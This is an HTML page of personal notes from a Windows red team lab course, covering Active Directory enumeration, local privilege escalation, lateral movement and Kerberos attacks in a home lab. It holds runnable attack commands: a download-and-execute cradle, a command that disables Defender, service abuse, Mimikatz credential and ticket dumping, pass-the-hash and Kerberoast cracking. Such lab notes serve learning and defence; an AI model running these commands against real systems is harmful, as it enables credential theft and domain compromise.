<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>More-AD-Notes</title>
</head><body>Windows Red Team Lab (video notes)<br/>
Lesson 1 Basics:<br/>
<br/>
Active Directory:<br/>
- Directory Service used to managed Windows networks<br/>
- stores information about objects on the network and makes it easily available to users and domains<br/>
- Active Directory enabled centralized, secure management of an entire network, which might span a building, a city or multiple locations<br/>
- Schema - defines objects and their attributes<br/>
- query and index mechanism - provides searching and publication of objects and their properties<br/>
- Global Catalog - contains information about every object in the directory<br/>
- Replication Service - distributes information across domain controllers<br/>
- Forest, domains and organizational unites (OUs) are the basic building blocks of any active directory structure.<br/>
&nbsp; &nbsp; - a forest is a security boundary - may contain multiple domains and each domain may contain multiple OUs.<br/>
<br/>
PowerShell:<br/>
- provides access to almost everything in a Windows platform and AD environment which could be useful for an attacker<br/>
- provides the capability of running powerful scripts completely from memory making it ideal for foothold shells/boxes<br/>
- easy to learn and really powerful<br/>
- based on .NET framework and is tightly integrated with Windows<br/>
- PowerShell Core is platform independent<br/>
<br/>
Open up Windows PowerShell ISE as an Administrator:<br/>
<br/>
See file with powershell commands...<br/>
<br/>
Cmdlets are used to perform an action and a .Net obkect is returned as the output<br/>
Cmdlets accept parameters for different operations<br/>
They have aliases.<br/>
These are NOT executables, you can write your own cmdlet with few lines of script.<br/>
<br/>
Examples:<br/>
cd C:\<br/>
dir: &nbsp; &nbsp;//this works<br/>
dir.exe: &nbsp; &nbsp;//this does not<br/>
<br/>
Important!<br/>
Use the below command for listing all cmdlets:<br/>
get-command -commandtype cmdlet<br/>
<br/>
There are many interesting cmdlets from a pentester's perspective.<br/>
For example:<br/>
get-process<br/>
, list processes running on a system.<br/>
<br/>
get-command -Name *process*<br/>
get-command -Verb set<br/>
<br/>
It is a GUI Editor/Scripting Environment.<br/>
Tab Completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features.<br/>
Comes with a handy console pane to run commands from the ISE.<br/>
<br/>
Execution Policy:<br/>
- this is NOT a security measure, but it is a prevention measure to prevent a user from accidently executing scripts<br/>
- several ways to bypass:<br/>
powershell -executionbypass bypass .\script.ps1<br/>
powershell -c &lt;cmd&gt;<br/>
powershell -enc<br/>
<br/>
Turn off the Windows Defender:<br/>
Set-MpPreference -disablerealtimeMonitoring $true<br/>
<br/>
.\Invoke-Encode.ps1<br/>
Get-ExecutionPolicy<br/>
powershell -ep bypass<br/>
Powershell.exe -ExecutionPolicy bypass -File C:\Users\win10\Downloads\nishang-master\Utility\Invoke-Encode.ps1<br/>
<br/>
- Powershell also supports modules.<br/>
- A module can be imported with:<br/>
Import-module &lt;path to module&gt;<br/>
<br/>
- all the commands in a module can be listed with:<br/>
Get-Command -Module &lt;modulename&gt;<br/>
Get-Command -module Get-ScheduledTask<br/>
Get-command -module<br/>
<br/>
################<br/>
. c:\AD\Tools\Invoke-Encode.ps1<br/>
- the '.' in front of the path (Above) is called dot sourcing.<br/>
################<br/>
<br/>
Whenever there is a command execution opportunity, PowerShell scripts can be executed using following methods:<br/>
- Download execute cradle<br/>
iex(New-Object net.webclient).DownloadString('https://webserver/payload.ps1')<br/>
- Encodedcommand<br/>
&gt;help powershell.exe &nbsp; &nbsp;//to find out powershell.exe available commands!<br/>
<br/>
CheckOut Invoke-CradleCrafter:<br/>
http://github.com/danielbohannon/Invoke-CradleCrafter<br/>
<br/>
#####################<br/>
Lesson 2 Domain Enumeration:<br/>
<br/>
PowerShell and AD:<br/>
- [ADSI]<br/>
- .Net Classes<br/>
- Native Executables<br/>
- PowerShell (.NET classes or WMI or Active Directory Module)<br/>
<br/>
Let's start wirh Domain Enumeration and map various entities, trusts, relationships and privileges of the target domain.<br/>
We will use open source tools, such as PowerView, for domain enumeration.<br/>
<br/>
https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1<br/>
<br/>
We will also use Microsoft Active Directory module:<br/>
https://docs.microsoft.com/en-us/powershell/module/addsadministration/<br/>
<br/>
After spending some time to install PowerView and the Install-ActiveDirectoryModule.ps1, we can finally start doing some domain enumeration!<br/>
<br/>
PS C:\users\win10\Downloads&gt; powershell.exe -executionpolicy unrestricted<br/>
Windows PowerShell<br/>
Copyright (C) Microsoft Corporation. All rights reserved.<br/>
<br/>
PS C:\users\win10\Downloads&gt; .\Install-ActiveDirectoryModule.ps1<br/>
<br/>
NAME<br/>
&nbsp; &nbsp; Install-ADModule<br/>
<br/>
SYNOPSIS<br/>
&nbsp; &nbsp; Installs the AD PowerShell module from RSAT for Windows 10<br/>
(partial copy above)<br/>
<br/>
- Get the current domain(PowerView)<br/>
Get-NetDomain<br/>
Get-NetDomain -Domain lethallab.local<br/>
<br/>
- Get the current domain SID:<br/>
Get-DomainSID<br/>
<br/>
- Using Active Directory module:<br/>
Get-ADDomain<br/>
Get-ADDomain -Identity lethallab.local<br/>
(Get-ADDomain).DomainSID.Value<br/>
<br/>
<br/>
Let's setup the environment!<br/>
You should make sure you have a good working Domain Controller, as all the information is being pulled from a Domain Controller.<br/>
<br/>
<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Recon&gt; Import-Module .\PowerView.ps1<br/>
PS C:\users\win10\Downloads\PowerSploit-master\recon&gt; get-command -module recon<br/>
PS C:\users\win10\Downloads\PowerSploit-master\recon&gt; get-netdomain<br/>
<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Recon&gt; get-netdomain -domain lethallab.local<br/>
<br/>
<br/>
Forest &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: lethallab.local<br/>
DomainControllers &nbsp; &nbsp; &nbsp; : {Win2008SRV.lethallab.local, WIN2016SRV.lethallab.local}<br/>
Children &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: {}<br/>
DomainMode &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: Windows2003Domain<br/>
DomainModeLevel &nbsp; &nbsp; &nbsp; &nbsp; : 2<br/>
Parent &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;:<br/>
PdcRoleOwner &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: Win2008SRV.lethallab.local<br/>
RidRoleOwner &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: Win2008SRV.lethallab.local<br/>
InfrastructureRoleOwner : Win2008SRV.lethallab.local<br/>
Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: lethallab.local<br/>
<br/>
-Get Domain Controllers for a domain:<br/>
PS C:\Users\win10\Downloads&gt; Get-NetDomainController<br/>
PS C:\Users\win10\Downloads&gt; Get-NetDomainController -domain lethallab.local<br/>
<br/>
- Using Active Directory module:<br/>
Get-ADDomainController<br/>
Get-ADDomainController -Discover -DomainName lethallab.local<br/>
<br/>
- Get users of a domain:<br/>
Get-NetUser<br/>
get-netuser | select name<br/>
Get-NetUser -Domain lethallab.local<br/>
Get-NetUser -UserName win10<br/>
<br/>
-Using ActiveDirectory module:<br/>
Get-ADUser -Filter * -Properties *<br/>
Get-ADUser -Server ps-dc.lethallab.local<br/>
Get-ADUser -Identity win10<br/>
<br/>
-Get all the groups in the current domain:<br/>
Get-NetGroup<br/>
Get-NetGroup *admin*<br/>
<br/>
- Using Active Directory Module:<br/>
Get-ADGroup -Filter * | select Name<br/>
Get-ADGroup -Filter 'Name -like "*admin*"' | select Name<br/>
get-adgroup -filter {Name -like "*admin*"} |select name<br/>
<br/>
- Get all the members of the Domain Admins group:<br/>
Get-NetGroupMember -GroupName "Domain Admins"<br/>
<br/>
- Get ActiveDirectory Module<br/>
Get-ADGroupMember -Identity "Domain Admins" -Recursive<br/>
<br/>
- Get the group membership of a user:<br/>
Get-NetGroup -UserName "labuser"<br/>
<br/>
- Using ActiveDirectory Module:<br/>
Get-ADPrincipalGroupMembership -Identity labuser<br/>
<br/>
- Get all computers of the domain:<br/>
Get-NetComputer<br/>
Get-NetComputer -FullData<br/>
<br/>
- Using ActiveDirectory Module:<br/>
Get-ADComputer -Filter * | select Name<br/>
Get-ADComputer -Filter * -Properties *<br/>
<br/>
Note to self: You should keep in mind and consider that the information is pulled from the information your Domain Controller has, and it's not an indication that the physical computer still exists. Most companies keep obsolete information in Active Directory, because they never go through an Active Directory maintenance and cleanup. In either case, the information can still be useful in your exploitation attempts!<br/>
<br/>
- Find all machines on the current domain where the current user has local admin access:<br/>
Find-LocalAdminAccess -verbose<br/>
<br/>
- Find local admins on all machines of the domain:<br/>
Invoke-EnumerateLocalAdmin -verbose<br/>
<br/>
- List Sessions on a particular computer:<br/>
Get-NetSession -ComputerName ops-dc<br/>
<br/>
Note: Domain Administrator is a very sought after target, but DO NOT go after the Domain Admin (DA) blindly! Make sure getting the DA account is the goal/purpose of the engagement!<br/>
<br/>
- Find computers where a domain admin is logged in and current user has access:<br/>
Invoke-UserHunter -CheckAccess -Verbose<br/>
<br/>
- Above gets a list of machines from DC and list sessions and logged on users_from_each machine! This is not easy to find, but it's still a useful command to run!<br/>
<br/>
<br/>
Hands-On number 1:<br/>
- Enumerate the following for the current domain:<br/>
Users, Computers, Domain Administrators, Shares, Sessions on the Domain Controller.<br/>
<br/>
Demonstration: Block user hunting(session enumeration) on the Domain Controller!!!!!!<br/>
- we can use a script called NetCease.ps1 that strips such permissions from a box.<br/>
<br/>
######<br/>
Domain Enumeration - ACL:<br/>
You can find ACLS in Active Directory under a user (for example), Security tab, Advanced, and the Permissions tab.<br/>
<br/>
- Get the ACLs associated with the specified object:<br/>
Get-ObjectACL -SamAccountName win10 -ResolveGUIs<br/>
<br/>
- Get the ACLs associated with the specified prefix to be used for search:<br/>
Get-ObjectACL -ADSprefix 'CN=Administrator, CN=Users' -Verbose<br/>
<br/>
- We can also enumerate ACLs using Active Directory Module but without resolving GUIDs:<br/>
(Get-ACL 'AD:\CN=win10, CN=Users, DC=win2008srv, DC=lethallab, DC=local').Access<br/>
<br/>
- To look for interesting ACEs:<br/>
Invoke-ACLScanner -ResolveGUIDs<br/>
<br/>
<br/>
Hands-On number 2:<br/>
- Enumerate following for the current domain:<br/>
Check if win10 user has Write/Modify permissions on any objects!<br/>
<br/>
<br/>
##############<br/>
Domain Enumeration - Trusts:<br/>
- Get a list of all domain trusts for the current domain, if you have any, but it's possible that in your home lab network, you will not have any, since you only have one forest or (if any) child domain:<br/>
Get-NetDomainTrust &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;//don't worry if you don't have any in your lab domain<br/>
Get-NetDomainTrust -Domain redps.offensiveps.lethallab.local &nbsp; &nbsp;//this would be a child domain of the lethallab.local domain<br/>
<br/>
- Using Active Directory Module:<br/>
Get-ADTrust -Filter *<br/>
Get-ADTrust -Identity redps.offensiveps.lethallab.local<br/>
<br/>
- Get details about the current forest:<br/>
Get-NetForest<br/>
Get-NetForest -Forest lethallab.local<br/>
<br/>
- Using Active Directory Module:<br/>
Get-ADForest<br/>
Get-ADForest -Identity lethallab.local<br/>
<br/>
- Get all domains in the current forest:<br/>
Get-NetForestDomain<br/>
Get-NetForestDomain -Forest lethallab.local<br/>
<br/>
- Using ActiveDirectory Module:<br/>
(Get-ADForest).Domains<br/>
<br/>
- Get trusts in the forest (if you have a forest trust in your lab and if you don't, then don't expect an output):<br/>
Get-NetForestTrust<br/>
Get-NetForestTrust -Forest lethallab.local<br/>
<br/>
- Using ActiveDirectory Module:<br/>
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'<br/>
<br/>
Hands-On number 3:<br/>
Enumerate all the trusts - domain trusts, external trusts and others for the current forest.<br/>
<br/>
#####################<br/>
Lesson 3 Local Privilege Escalation:<br/>
<br/>
- up to now, we have only done a lot of enumeration!<br/>
<br/>
In an AD environment, there are multiple scenarios which lead to privilege escalation. We had a look for the following:<br/>
- Hunting for Local Admin access on other machines<br/>
- Hunting for high privilege domain account (like a Domain Admin)<br/>
There are various ways to privilege escalate on Windows boxes:<br/>
- Missing patches<br/>
- Automated deployment and AutoLogon passwords in clear text<br/>
- AlwaysInstallElevated (any user can run MSI on SYSTEM)<br/>
- Misconfigured Services<br/>
- DLL HiJacking<br/>
- Token Manipulation or Impersonation<br/>
<br/>
PowerUp:<br/>
- Let's use PowerUp from PowerSploit for local privilege escalation by abusing services.<br/>
- Get Services with unquotes paths and a space in their name or executable path:<br/>
Get-ServiceUnquotes -Verbose<br/>
<br/>
ex:<br/>
Get-WmiObject win32_service | fl *<br/>
<br/>
For instance if in the path c:\ftpserver\ftp server\myftp\ftp.exe , the c:\ftpserver\ftp server\myftp\ftp.exe is unquoted, an attacker can drop an ftp.exe, and as soon as the user, right the right permissions, run the program, we can privilege escalate. That's why it's called the unquoted path vulnerability! For this to NOT work, the path would have to be in quotes, like this:<br/>
"c:\ftpserver\ftp server\myftp\ftp.exe" .<br/>
<br/>
- Get Services where the current user can write to its binary path:<br/>
Get-ModifiableServiceFile -Verbose<br/>
<br/>
- Get the Services which current user can modify:<br/>
Get-ModifiableService -Verbose<br/>
<br/>
- Run all Checks:<br/>
Invoke-AllChecks<br/>
<br/>
Example:<br/>
PS C:\Users\win10\Downloads\PowerSploit-master&gt; cd .\Privesc\<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc&gt; ls<br/>
&nbsp; &nbsp; Directory: C:\Users\win10\Downloads\PowerSploit-master\Privesc<br/>
<br/>
Mode &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;LastWriteTime &nbsp; &nbsp; &nbsp; &nbsp; Length Name<br/>
---- &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;------------- &nbsp; &nbsp; &nbsp; &nbsp; ------ ----<br/>
-a---- &nbsp; &nbsp; &nbsp; &nbsp; 9/2/2018 &nbsp;11:55 PM &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;26485 Get-System.ps1<br/>
-a---- &nbsp; &nbsp; &nbsp; &nbsp; 9/2/2018 &nbsp;11:55 PM &nbsp; &nbsp; &nbsp; &nbsp; 562841 PowerUp.ps1<br/>
-a---- &nbsp; &nbsp; &nbsp; &nbsp; 9/2/2018 &nbsp;11:55 PM &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 1564 Privesc.psd1<br/>
-a---- &nbsp; &nbsp; &nbsp; &nbsp; 9/2/2018 &nbsp;11:55 PM &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 67 Privesc.psm1<br/>
-a---- &nbsp; &nbsp; &nbsp; &nbsp; 9/2/2018 &nbsp;11:55 PM &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 4297 README.md<br/>
<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc&gt; Import-Module .\PowerUp.ps1<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc&gt; Invoke-AllChecks<br/>
[*] Running Invoke-AllChecks<br/>
[*] Checking if user is in a local group with administrative privileges...<br/>
[+] User is in a local group that grants administrative privileges!<br/>
[+] Run a BypassUAC attack to elevate privileges to admin.<br/>
[*] Checking for unquoted service paths...<br/>
[*] Checking service executable and argument permissions...<br/>
ServiceName &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : ISSUSER<br/>
Path &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE<br/>
ModifiableFile &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: C:\<br/>
ModifiableFilePermissions &nbsp; &nbsp; &nbsp; : AppendData/AddSubdirectory<br/>
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users<br/>
StartName &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : LocalSystem &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;----- with LOCALSYSTEM!!!!!!!<br/>
AbuseFunction &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : Install-ServiceBinary -Name 'ISSUSER'<br/>
CanRestart &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: False &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&lt;------- we need to wait for the machine to be rebooted<br/>
<br/>
ServiceName &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : ISSUSER<br/>
Path &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: "C:\Program Files\LANDesk\LDClient\issuser.exe" /SERVICE<br/>
ModifiableFile &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: C:\<br/>
ModifiableFilePermissions &nbsp; &nbsp; &nbsp; : {Delete, GenericWrite, GenericExecute, GenericRead}<br/>
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users<br/>
StartName &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : LocalSystem<br/>
AbuseFunction &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; : Install-ServiceBinary -Name 'ISSUSER'<br/>
CanRestart &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: False<br/>
<br/>
[*] Checking service permissions...<br/>
[*] Checking %PATH% for potentially hijackable DLL locations...<br/>
<br/>
ModifiablePath &nbsp; &nbsp;: C:\Users\win10\AppData\Local\Microsoft\WindowsApps<br/>
IdentityReference : LETHALLAB\win10<br/>
Permissions &nbsp; &nbsp; &nbsp; : {WriteOwner, Delete, WriteAttributes, Synchronize...}<br/>
%PATH% &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;: C:\Users\win10\AppData\Local\Microsoft\WindowsApps<br/>
AbuseFunction &nbsp; &nbsp; : Write-HijackDll -DllPath 'C:\Users\win10\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'<br/>
<br/>
[*] Checking for AlwaysInstallElevated registry key...<br/>
[*] Checking for Autologon credentials in registry...<br/>
[*] Checking for modifidable registry autoruns and configs...<br/>
[*] Checking for modifiable schtask files/configs...<br/>
[*] Checking for unattended install files...<br/>
[*] Checking for encrypted web.config strings...<br/>
[*] Checking for encrypted application pool and virtual directory passwords...<br/>
[*] Checking for plaintext passwords in McAfee SiteList.xml files....<br/>
[*] Checking for cached Group Policy Preferences .xml files....<br/>
<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc&gt;<br/>
<br/>
##########<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc&gt; Invoke-ServiceAbuse<br/>
<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc&gt; Invoke-ServiceAbuse -examples<br/>
<br/>
PS C:\Users\win10\Downloads\PowerSploit-master\Privesc&gt; Invoke-ServiceAbuse -Name AbyssWebServer -UserName 'lethallab\wi<br/>
n10'<br/>
<br/>
- the last Invoke-ServiceAbuse command, will add the current user: win10 to the local Administrators group. We had to read the Invoke-ServiceAbuse with the -examples parameter, so that we can learn how to run the command properly. We will need to logoff from the account and log on, so that the new permissions take effect!<br/>
<br/>
And now with Admin privileges we can run the command below to disable AV protection:<br/>
&gt;Set-MpPreference -DisableRealtimeMonitoring $true<br/>
<br/>
Hands-On number 4:<br/>
Exploit a service on your lab VM and elevate privileges to local administrator!<br/>
<br/>
#####################<br/>
Lesson 4 Lateral Movement Protocols and tools:<br/>
<br/>
PowerShell Remoting<br/>
Think of it as psexec on steroids.<br/>
You will find this increasingly used in enterprises. Enabled by default on Server 2012 onwards!<br/>
You may need to enable remoting (Enable-PSRemoting) on a Desktop Windows machines, Admin privs are required to do that.<br/>
You get elevated shell on remote system if admin creds are used to authenticate (which is the default setting).<br/>
<br/>
One-on-One<br/>
PSSession:<br/>
- Interactive<br/>
- Runs in a new process (wsmprovhost)<br/>
- Is Stateful<br/>
Useful cmdlets:<br/>
- New-PSSession<br/>
- Enter-PSSession<br/>
<br/>
Example:<br/>
PS C:\Users\Administrator.WIN2008SRV&gt; new-pssession -ComputerName win2016srv<br/>
<br/>
&nbsp;Id Name &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ComputerName &nbsp; &nbsp;State &nbsp; &nbsp;ConfigurationName &nbsp; &nbsp; Availability<br/>
&nbsp;-- ---- &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;------------ &nbsp; &nbsp;----- &nbsp; &nbsp;----------------- &nbsp; &nbsp; ------------<br/>
&nbsp; 1 Session1 &nbsp; &nbsp; &nbsp; &nbsp;win2016srv &nbsp; &nbsp; &nbsp;Opened &nbsp; Microsoft.PowerShell &nbsp; &nbsp; Available<br/>
<br/>
PS C:\Users\Administrator.WIN2008SRV&gt; $sess = New-PSSession -computername win2016sr<br/>
PS C:\Users\Administrator.WIN2008SRV&gt; Enter-PSSession -session $sess<br/>
[win2016srv]: PS C:\Users\administrator\Documents&gt; hostname<br/>
WIN2016SRV<br/>
<br/>
PowerShell Remoting:<br/>
- One-to-Many<br/>
- Also Known as Fan-Out remoting<br/>
- non-interactive<br/>
- executes commands parallely<br/>
- useful cmdlets<br/>
&nbsp; &nbsp; - Invoke-Command<br/>
- Invoke-Command<br/>
- Run commands and scripts on:<br/>
&nbsp; &nbsp; - multiple remote computers<br/>
&nbsp; &nbsp; - in disconnected session (v3)<br/>
&nbsp; &nbsp; - as background job and more.<br/>
- the best thing in PowerShell for passing the hashes, using credentials and executing commands on multiple remote computers.<br/>
- Use-Credential parameter to pass username/password.<br/>
- use below to execute commands or semicolon separated scripts:<br/>
Invoke-Command -Scriptblock {Get-Process} -ComputerName (Get-Content &lt;list of servers&gt;)<br/>
<br/>
example:<br/>
Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv<br/>
PS C:\Users\Administrator.WIN2008SRV&gt; Invoke-Command -ScriptBlock{whoami;hostname} -ComputerName win2016srv<br/>
lethallab\administrator<br/>
WIN2016SRV<br/>
<br/>
Invoke-Command -ScriptBlock{$who = whoami} -ComputerName win2016srv<br/>
Invoke-Command -ScriptBlock{$who} -ComputerName win2016srv<br/>
<br/>
- use below command to execute scripts from files:<br/>
Invoke-Command -FilePath c:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content &lt;list of servers&gt;)<br/>
<br/>
ex:<br/>
Invoke-Command -FilePath c:\AD\Tools\Invoke-Encode.ps1 -ComputerName Win2016srv<br/>
<br/>
powershell.exe -ep bypass<br/>
. c:\AD\Tools\Invoke-Mimikatz.ps1<br/>
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ComputerName win2016srv<br/>
<br/>
- Use below to execute "Stateful" commands:<br/>
$Sess = New-PSSession -ComputerName Server1<br/>
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}<br/>
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}<br/>
<br/>
$sess = New-PSSession -computername win2016sr<br/>
Invoke-Command -ScriptBlock{$who = whoami} -Session $sess<br/>
Invoke-Command -ScriptBlock{$who} -Session $sess<br/>
<br/>
Invoke-Mimikatz:<br/>
- the script could be used to dump credentials, tickets and more using mimikatz with PowerShell without dropping the exe to the disk.<br/>
- it is useful for passing and replaying hashes, tickets and for many exciting Active Directory attacks<br/>
- using the code from ReflectivePEInjection, mimikatz is loaded reflectively into the memory. All the functions of mimikatz could be useful from this script!<br/>
<br/>
- mimikatz is still being detected, but we can still use it with downloaded cradle, or everywhere where we can execute commands or powershell.<br/>
<br/>
- Dump Credentials on a local machine:<br/>
Invoke-Mimikatz -DumpCreds<br/>
<br/>
- Dump certs on a local machine:<br/>
Invoke-Mimikatz -DumpCerts<br/>
<br/>
- Dump Credentials on multiple remote machines:<br/>
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")<br/>
<br/>
- Invoke-Mimikatz uses PowerShell remoting cmdlet Invoke-Command to run the above command. Thus, credentials or administrative access to the remote computers is required!<br/>
<br/>
- "Over-pass-the-hash" generate tokens from hashes:<br/>
Invoke-Mimikatz -Command '"sekurlsa::pth /user:administrator /domain:. /ntlm:&lt;ntlmhash&gt; /run:powershell.exe"'<br/>
(we can run any command instead of the powershell.exe)<br/>
<br/>
Token Manipulation:<br/>
- it is possible to use/impersonate tokens available on a machine<br/>
- often tokens are available on machines due to interactive logons, accessing resources, running processes, SSO applications, etc.<br/>
- can we use Invoke-TokenManipulation from PowerSploit or Incognito for token impersonation<br/>
- administrative privileges are required to adjust token privileges.<br/>
<br/>
- List all the tokens on a machine:<br/>
Invoke-TokenManipulation -ShowAll<br/>
<br/>
- List all unique, usable tokens on a machine:<br/>
Invoke-TokenManipulation -Enumerate<br/>
<br/>
- Start a new process with token from a specific user:<br/>
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"<br/>
<br/>
- Start news process with token of another process:<br/>
Invoke-TokenManipulation -CreateProcess "C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -ProcessID 500<br/>
<br/>
#############################<br/>
Video 5 Domain Privilege Escalation:<br/>
<br/>
NOTE: some information below might not be accurate, because I didn't have a trust domain configured in my home lab; so treat it with a grain of salt, but know that the commands are accurate and the only thing you should worry about is the domains in the command.<br/>
<br/>
Read up on Kerberos authentication and how the client computer contacts the KDC/DC server, to receive the TGT/TGS so that it can access an application server and also how every step, it's abusable!<br/>
<br/>
Kerberoast:<br/>
- offline cracking of service account passwords<br/>
- the Kerberos session ticket (TGS) has a server portion which is encrypted with the password hash of the service account. This makes it possible to request a ticket and do offline brute-forcing.<br/>
- service accounts are many times ignored (passwords are rarely changed) and have Domain Admin privilege access.<br/>
- password hashes of service accounts could be used to create Silver tickets.<br/>
- presented by Tim Medin at DerbyCon 2014.<br/>
<br/>
<br/>
We are after the TGT encrypted ticket with krbtgt hash when requesting a TGS ticket (TGS-REQ).<br/>
TGS encrypted using target service's NTLM hash (TGS-REP).<br/>
We can request a TGS from any service and the KDC will respond with a TGT ticket.<br/>
<br/>
- Find Service Accounts:<br/>
GetUserSPNs<br/>
https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1<br/>
<br/>
- PowerView:<br/>
Get-NetUser -SPN<br/>
<br/>
Note: for the above command, you should know which user accounts are domain admins!<br/>
<br/>
- Active Directory module (to find krbtgt and priv service accounts)<br/>
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName<br/>
<br/>
- Request a ticket:<br/>
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQL/win2016srv.lethallab.local:SQLEXPRESS"<br/>
<br/>
- Request a ticket using PowerView:<br/>
Request-SPNTicket<br/>
<br/>
- Check if the ticket has been granted:<br/>
klist.exe<br/>
<br/>
- Export all tickets using Mimikatz:<br/>
Invoke-Mimikatz -Command '"kerberos::list /export"'<br/>
ls<br/>
<br/>
Crack the Service account password:<br/>
python.exe .\tgsrepcrack.py .\passwords.txt '.\2-40a10000-labuser@MSSQLvc~ops-win2016srv.lethallab.local~SQLEXPRESS-lethallab.local.kirbi'<br/>
<br/>
Kerberos Delegation:<br/>
- Kerberos Delegation allows the "to reuse the end-user credentials to access resources hosted on a different server". Like an application server or database server. This is generally used where Kerberos Double Hop is required.<br/>
- Impersonating the incoming/authenticating user is necessary for any kind of Kerberos delegation to work.<br/>
- Kerberos delegation is of two types:<br/>
&nbsp; &nbsp; - Unconstrained (only option till Server 2003)<br/>
&nbsp; &nbsp; - Constrained<br/>
<br/>
How does Kerberos Delegation work:<br/>
- a user provides credentials to the Domain Controller<br/>
- the DC returns a TGT<br/>
- the user requests a TGS for the web service on Web Server<br/>
- The DC provides a TGS.<br/>
- the user sends the TGT and TGS to the web server.<br/>
- the web server service account uses the user's TGT to request a TGS for the database server from the DC.<br/>
- the web server service account connects to the database server as the user.<br/>
<br/>
Unconstrained Delegation:<br/>
When set for a particular service account, Unconstrained delegation allows delegation to any service on that particular machine.<br/>
The service account can then request access to any service in the domain by impersonating the incoming user (because the DC placed the user's TGT inside the TGS in step 4). In our example, the web server service account can request access to any service in the domain as the user connecting to it.<br/>
This could be used to escalate privileges in case we can compromise such a machine and a Domain Admin (or other high privilege user) connects to that machine.<br/>
<br/>
- Discover domain computers which have unconstrained delegation enabled using PowerView:<br/>
Get-NetComputer -UnConstrained<br/>
<br/>
- Using Active Directory Module:<br/>
Get-ADComputer -Filter {TrustedForDelegation -eq $True}<br/>
Get-ADUser -Filter {TrustedForDelegation -eq $True}<br/>
<br/>
